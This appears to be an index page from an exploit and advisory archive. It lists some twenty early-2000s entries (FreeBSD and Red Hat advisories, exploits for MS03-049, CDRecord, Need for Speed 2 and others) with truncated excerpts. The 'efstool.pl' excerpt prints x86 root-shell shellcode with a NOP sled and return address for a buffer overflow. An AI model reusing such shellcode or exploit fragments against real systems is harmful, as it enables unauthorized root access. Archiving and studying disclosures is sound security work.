jailed processes can manipulate host routing tables

A programming error resulting in a failure to verify that an attempt to manipulate routing tables originated from a non-jailed process. Jailed processes running with superuser privileges could modify host routing tables. This could result in a variety of consequences including packets being sent...

Need for Speed 2 Remote Client Buffer Overflow Exploit

No description provided by source. / Need for Speed 2 Remote Client Buffer Overflow Exploit - 23.01.2004 by Luigi Auriemma UNIX & WIN VERSION / include stdio.h include stdlib.h include string.h ifdef WIN32 include winsock.h include "winerr.h" define close closesocket else include unistd.h include...

bind8 negative cache poison attack

A programming error in BIND 8 named can result in a DNS message being incorrectly cached as a negative response. As a result, an attacker may arrange for malicious DNS messages to be delivered to a target name server, and cause that name server to cache a negative response for some target domain...

Microsoft Windows - Workstation Service WKSSVC Remote (MS03-049)

/ Author: snooq Date: 14 November 2003 +++++++++++++ THIS IS A PRIVATE VERSION +++++++++++++++ This is just slightly better than the one I posted to packetstorm.... The public version will crash 'services.exe' immediately while this one crash it only when u exit from shell.... I'm still trying to...

FreeBSD Security Advisory FreeBSD-SA-03:16.filedesc

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ============================================================================= FreeBSD-SA-03:16.filedesc Security Advisory The FreeBSD Project Topic: file descriptor leak in readv Category: core Module: kernel Announced: 2003-10-02 Credits: Joost Pol...

Microsoft MCWNDX.OCX ActiveX buffer overflow

Microsoft MCWNDX.OCX ActiveX buffer overflow ================================================= PROGRAM: MICROSOFT MCIWNDX.OCX ACTIVEX BUFFER OVERFLOW HOMEPAGE: www.microsoft.com VULNERABLE VERSIONS: MCWNDX is an ActiveX shipped with Visual Studio 6 to support multimedia programming. DESCRIPTION...

Microsoft Windows Media Services contains buffer overflow in "nsiislog.dll"

Overview Microsoft Windows Media Services provides streaming audio and video capabilities. A vulnerability in a component of this software could allow a remote attacker to compromise the server running it. Description According to Microsoft Security Bulletin MS03-022:Microsoft Windows Media...

MegaBrowser 0.71b - Multiple Vulnerabilities

MegaBrowser 0.71b - Multiple Vulnerabilities MegaBrowser Multiple Vulnerabilities Vendor: Quality Programming Corporation Product: MegaBrowser Version: = 0.71b Website: http://www.megabrowser.com BID: 7802 7803 Description: Megabrowser is a free standalone program that enables you to host website...

MegaBrowser < 0.71b - Multiple Vulnerabilities

MegaBrowser Multiple Vulnerabilities Vendor: Quality Programming Corporation Product: MegaBrowser Version: = 0.71b Website: http://www.megabrowser.com BID: 7802 7803 Description: Megabrowser is a free standalone program that enables you to host websites and FTP sites by utilizing its powerful...

Important: Red Hat Security Advisory: xinetd security update

Updated xinetd packages fix a security vulnerability and other bugs. Xinetd is a master server that is used to to accept service connection requests and start the appropriate servers. Because of a programming error, memory was allocated and never freed if a connection was refused for any reason. ...

OneOrZero Helpdesk 1.4 - install.php Administrative Access

OneOrZero Helpdesk 1.4 - install.php Administrative Access source: https://www.securityfocus.com/bid/7611/info OneOrZero Helpdesk has been reported prone to an issue that may result in an attacker obtaining unauthorized administrative access. The issue presents itself due to a programming error i...

OneOrZero Helpdesk 1.4 - 'install.php' Administrative Access

source: https://www.securityfocus.com/bid/7611/info OneOrZero Helpdesk has been reported prone to an issue that may result in an attacker obtaining unauthorized administrative access. The issue presents itself due to a programming error in a Helpdesk script. Reportedly a script does not...

CDRTools CDRecord 1.11/2.0 - Devname Format String

// source: https://www.securityfocus.com/bid/7565/info CDRecord has been reported prone to a format string vulnerability. The issue presents itself due to a programming error that occurs when calling a printf-like function. It has been reported that by harnessing an unsupported feature of the...

CDRTools CDRecord 1.112.0 - Devname Format String

CDRTools CDRecord 1.112.0 - Devname Format String // source: https://www.securityfocus.com/bid/7565/info CDRecord has been reported prone to a format string vulnerability. The issue presents itself due to a programming error that occurs when calling a printf-like function. It has been reported th...

Lib CGI 0.1 - Include Buffer Overflow

// source: https://www.securityfocus.com/bid/6264/info Lib CGI is a freely available, open source CGI library for C programmers. It is available for Unix and Linux operating systems. It has been reported that a buffer overflow exists in the Lib CGI development library. Due to improper bounds...

FreeNews 2.1 - Include Undefined Variable Command Execution

source: https://www.securityfocus.com/bid/6258/info FreeNews is a freely available, open source News software package. It is written in PHP, and designed for use on Unix and Linux operating systems. Programming errors in FreeNews could lead to the inclusion of arbitrary files on remote servers in...

Trillian 0.74 - IRC Raw Messages Denial of Service

Trillian 0.74 - IRC Raw Messages Denial of Service // source: https://www.securityfocus.com/bid/5775/info A vulnerability has been reported for Trillian. Reportedly, Trillian is prone to a denial of service condition when certain IRC raw messages are received by the client. This may be exploited ...

efstool.pl

!/usr/bin/perl Another efstool exploit $shell = "\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x31\xc0\x50\x89". "\xe2\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89". "\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"; $ret =0xbfffe590; $buf = 3000; $egg = 2000; $nop = "\x90"; $offset = 0; if @ARGV == 1 $offset = $ARGV0;...

RUS-CERT Advisory 2002-08:01: Incorrect integer overflow detection in C code

Incorrect integer overflow detection in C code A widely used method of detecting integer overflows results in undefined behavior according to the C standard. Who Should Read This Document This advisory deals with with details of the C programming language. It is targeted at C programmers. Systems...

codeblue.txt

TITLE: Pontential remote root in CodeBlue log scanner NAME: DEMI SEX GOD FROM HELL ADV 00001 DATE: YES, PLEASE MAIL ME IF YOU ARE FEMALE send pictures CRAZY TRACKING NUMBER THAT MAKES IT LOOK LIKE I HAVE SOME MASSIVE DATABASE OF JUAREZ: 7363A64B02 Props to dme@! Information ----------- you may...